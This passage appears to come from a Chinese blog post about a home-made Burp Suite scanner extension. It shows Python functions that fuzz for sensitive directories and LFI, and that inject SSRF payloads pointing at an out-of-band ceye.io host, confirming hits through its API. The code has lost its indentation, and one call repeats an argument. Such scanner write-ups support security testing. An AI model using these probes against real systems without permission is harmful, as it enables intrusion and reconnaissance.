首先分析url,获取其404页面的状态码和返回数据包大小,再进行扫描根据扫描状态码判断是否为敏感目录,这里的状态码判断抄的李姐姐的bbscan,扫描页面的大小和404页面的大小要大于50,这点可以动态调整
def lfiDir(self, request, protocol, host, port, ishttps, url,html404_status, html404_content):
for paraNewValue in self.fuzzLFI.dir2:
newRequest = self._helpers.buildHttpRequest(URL(url+paraNewValue))
#print(url+paraNewValue)
newResponse = self._callbacks.makeHttpRequest(host, port, ishttps, newRequest)
newAnalyzedRequest, newReqHeaders, newReqBodys, newReqMethod, newReqParameters = self.get_request_info(
newRequest)
newResHeaders, newResBodys, newResStatusCode, resLength = self.get_response_info(
newResponse)
errorInject = self.fuzzLFI.errorFlag.findall(newResBodys)
if errorInject or (newResStatusCode == 206) or ((newResStatusCode == 200 or newResStatusCode == 302 or newResStatusCode == 301) and abs(resLength - len(html404_content))>50):
newReqUrl = self.get_request_url(protocol, newReqHeaders,host,port)
content = '[+]{} ->{} {} [Headers] -> {} [Bodys] -> {}'.format('[DIR GET]',errorInject,newReqUrl, newReqHeaders, newReqBodys)
print(content)
self.save(content + ' ')
print('-' * 50)
break
2.3
xxe和ssrf的http协议使用ceye.io 和dnslog.io,然后调用api接口查询是否有响应dnslog记录
SSRF代码示例,这里把url跳转也放在ssrf判断里面了
def ssrfHttp(self, request, protocol, host, port, ishttps, parameterName, parameterValue, parameterType,ResStatusCode):
paraNewValue = 'http://'+host+'.m4mta5.ceye.io/'+host+parameterName+"testssrf1234567890"
newParameter = self._helpers.buildParameter(parameterName, paraNewValue, parameterType)
newRequest = self._helpers.updateParameter(request, newParameter)
#print(newRequest)
newResponse = self._callbacks.makeHttpRequest(host, port, ishttps, newRequest)
newAnalyzedRequest, newReqHeaders, newReqBodys, newReqMethod, newReqParameters = self.get_request_info(
newRequest)
newResHeaders, newResBodys, newResStatusCode,resLength= self.get_response_info(newResponse)
pattern = re.compile(host + parameterName + "testssrf1234567890" )
response = self.ceyeFin()
result = pattern.findall(response)
if result:
newReqUrl = self.get_request_url(protocol, newReqHeaders,host,port,port)
content = '[+]{} -> {} [Headers] -> {} [Bodys] -> {}'.format('[SSRF GET]',newReqUrl, newReqHeaders, newReqBodys)
print (content)
self.save(content + ' ')
print ('-' * 50)
if (paraNewValue in "".join(newResHeaders) and newResStatusCode!=ResStatusCode):
newReqUrl = self.get_request_url(protocol, newReqHeaders,host,port)
content = '[+]{} -> {} [Headers] -> {} [Bodys] -> {}'.format('[URL GET]', newReqUrl, newReqHeaders,
newReqBodys)
print (content)
self.save(content + ' ')
print ('-' * 50)
4、展示效果
SSRFfile协议,DIrscan